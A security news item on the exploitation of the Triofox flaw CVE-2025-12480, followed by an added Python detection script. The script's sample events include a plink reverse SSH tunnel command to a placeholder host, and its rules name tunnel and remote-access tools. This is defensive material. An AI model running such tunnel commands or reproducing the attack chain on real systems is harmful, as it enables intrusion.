Mandiant Threat Defense has revealed exploitation of a critical vulnerability in Gladinet's Triofox platform, tracked as CVE-2025-12480.
Timeline and Actions
The flaw, with a CVSS score of 9.1, allowed unauthenticated access to Triofox's configuration pages. Attackers used this access to create a native administrator account named "Cluster Admin" and then upload and execute arbitrary payloads. Mandiant observed this activity, attributed to threat cluster UNC6485, starting from 2025-08-24.
- Triofox users were vulnerable starting 2025-08-24.
- The exploit allowed attackers to execute malicious files as SYSTEM.
- Exploitation included deploying Zoho Assist and AnyDesk for deeper intrusion.
- Actions recommended: update Triofox, audit admin accounts.
Exploitation Details
Attackers pointed Triofox's antivirus scanner setting at a malicious script named "centre_report.bat", which the platform then ran as SYSTEM. This script downloaded Zoho UEMS installer files from 84.200.80.252 to support remote access via tools like Zoho Assist, enabling reconnaissance and privilege escalation. Additional tools such as Plink and PuTTY were employed to establish SSH tunnels over port 443, facilitating inbound Remote Desktop Protocol (RDP) access.
Mandiant advises clients to update Triofox to the latest version, carefully audit administrator accounts, and ensure the antivirus settings prohibit unauthorized script execution.
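The following is an added detection example, not code from Mandiant or Gladinet. It runs three rules derived from the chain described above (a script launched as SYSTEM by the Triofox service, Plink/PuTTY building an SSH tunnel over port 443, and remote-access tooling spawned by that script) over constructed, Sysmon-like process-creation events; the field names and file paths are assumptions, not Triofox's real ones.

```python
import re

# Constructed sample telemetry (not from the report), in a simplified Sysmon-like shape.
# Assumed field names: image, parent_image, user, command_line. Paths are hypothetical.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Temp\centre_report.bat",
     "parent_image": r"C:\Program Files\Gladinet\Triofox\svc.exe",
     "user": r"NT AUTHORITY\SYSTEM", "command_line": "centre_report.bat"},
    {"image": r"C:\Users\Public\plink.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM",
     "command_line": "plink.exe -ssh -P 443 -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"image": r"C:\Program Files\Zoho\UEMS\agent.exe",
     "parent_image": r"C:\Windows\Temp\centre_report.bat",
     "user": r"NT AUTHORITY\SYSTEM", "command_line": "agent.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "user": r"CORP\alice", "command_line": "notepad.exe"},
]

SCRIPT_EXT = re.compile(r"\.(bat|cmd|ps1|vbs)$", re.IGNORECASE)
TUNNEL_TOOLS = {"plink.exe", "putty.exe"}
REMOTE_ACCESS = ("zoho", "anydesk")


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event triggers (empty when nothing matches)."""
    hits = []
    img, parent = basename(event["image"]), basename(event["parent_image"])
    user, cmd = event["user"].lower(), event["command_line"].lower()
    # Rule 1: the abused antivirus-scanner setting runs a script as SYSTEM under the Triofox service.
    if SCRIPT_EXT.search(img) and user.endswith("system") and "triofox" in event["parent_image"].lower():
        hits.append("triofox_av_script_as_system")
    # Rule 2: Plink/PuTTY invoked with SSH on port 443, the tunnel used to bring RDP inbound.
    if img in TUNNEL_TOOLS and re.search(r"-p\s*443\b", cmd):
        hits.append("ssh_tunnel_over_443")
    # Rule 3: remote-access tooling (Zoho UEMS/Assist, AnyDesk) spawned directly by a script.
    if any(tool in event["image"].lower() for tool in REMOTE_ACCESS) and SCRIPT_EXT.search(parent):
        hits.append("remote_access_tool_from_script")
    return hits


def scan(events):
    """Return (image, rules) pairs for every event that triggered at least one rule."""
    return [(e["image"], classify(e)) for e in events if classify(e)]
```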